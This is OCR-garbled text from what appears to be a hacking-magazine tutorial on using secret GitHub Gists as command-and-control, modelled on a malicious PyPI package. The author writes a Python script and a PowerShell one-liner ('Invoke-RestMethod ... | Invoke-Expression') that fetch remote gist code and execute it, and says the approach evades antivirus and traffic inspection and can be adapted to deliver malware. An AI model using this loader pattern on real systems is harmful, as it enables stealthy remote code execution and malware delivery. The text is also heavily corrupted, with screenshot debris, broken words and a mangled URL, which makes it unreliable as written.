ca o8 Ory Kali Linux. @ Kali Tools # Kali Docs @KaliForums @ Kali NetHunter Exploit-DBPT ey Kali Linux #8 Kali Tools # KaliDocs XQ KaliForums @& KaliNetHunter ® Exploit-DB GitHubGist et rey Cay To view the entire URL of th = omy Pariernee Cn eae Loe ee Lele cn cae) Peewee Vito opy it. It needs to be pasted somewhere. The malware observed by Reversing Labs was a Python| h had its malicious code in the setup.py file. (we have already seen how to createmalicious PYPI package r 2 Issue), This malware fetched commands to be executed on the local machine from Github Gist. We will also do the same but instead of creating a malicious Python package I will create a simple pyt- Ihon script named “test_hc.py” for this as shown below 1am pretty sure you will understand the code yourself but let me explain it to you briefly. The ” and “os” modules. In the second line, we declare a variable nami frst line imports the “requ “url” and assign it the value of the url we just copied earlier (the url of the gist). Yes, this is the ame url where we have our secret gist. In the third line, another variable name res” is created which gets a value at the url. In the fourth line, we execute the value found at “res” variable. ‘ow, we need to execute this python script. But before that let’s make sure there is no folder| named “hackercool” in the tmp folder execute the Pyt!he exploit mmand of python will not retu any output on screen. But, in the tmp med “hacker stored a command for our exploit on Github gist and executed it directly from the target system. Another good thing about gists is that we can create code snippets in other languages too, just python as shown here. We have shown you in python because the malware analyzed by IReversing Labs was in python, Now, let’s create a PowerShell gist. Go to the gist and click on GitHub Gist Cee eu) CeHere, I add a script in PowerShell to open Notepad.exe and change the name of the gist to hc_test.ps1”. iets) et Pome Cerne After making changes, scroll down and click on “update secret gist” button ery ca Pee Comers Oa er lomnal o8 Peet ecu Kali Linux. @ Kali Tools # Kali Docs € KaliForums @& Kali NetHunter * Exploit-DB Perea e Oe re caer41 ina Windows machine, I write a Powershell script named “test_hc.ps1”, [SeistUrT = “https+/7alst. gl thubusercontent. con/hackercoolnaga/ FSCS SSB1dISCbaSCFObeTeaTOCIO7C] ran] T56BS0TTSTECSEOS| HTnvoke-RestMethod Uri $gistUrl | Invoke-Expression er) aX s)*\e|\8ool\e PowerShell has a cmdlet called Inoke-restmethod that can be used to execute commands from [eithub gists, In the first line. we are creating a variable named gisturl and assign it the url of our ecret gist. In the second line, we use Invoke-RestMethod to execute the code at this gist. Once thi PowerShell script is executed, it opens notepad as expected.42 INow, do one thing. Observe the code of the “test_hc.ps1” and “test_he.py” carefully. You will fin- ld that both these programs do not contain any malicious code for Antivirus to flag it as malicious. If there is anything close to malicious (even though it is not) in these scripts, it was making a conn lection to an external site, which is Github, So even if anyone observes the traffic these scripts are making, there is nothing malicious in it. It is just making a connection to Github which is not hincommon at all Here, for this tutorial, I have used commands like creating a new directory and opening a genuine application. But this can be modified to download and executing malware. As I already mentioned, secret gists are not visible or searchable. Googl gitwbhackercoolmagz x ¢ —— hackercoolmagz/Vulnera: A repository for all the vulnerable Arent all the vulner ware use Hackercool Magazine - the cyber Pion Kali Linux @9 KaliTools # KaliDocs 8 KaliForums @& Kali NetHunter ® Explo ‘ei Cred ale Te ccna’ eens But as we have seen in the code of “test_hc.py’ and “test_he.ps1” that gists are entirely accessible lprovided we have the URL and not entirely private. This in itself provides, Black Hat Hackers an excellent advantage. Apart from this, hosting their commands on Github gives undisturbed hosting power. Otherwise hackers would have to create the C & C infrastructure themselves. Connecting to Github is less suspicious than connecting to kome IP address controlled by the hackers. No doubt, Black Hat Hacker groups are adopting this lechnique to hide their malicious activit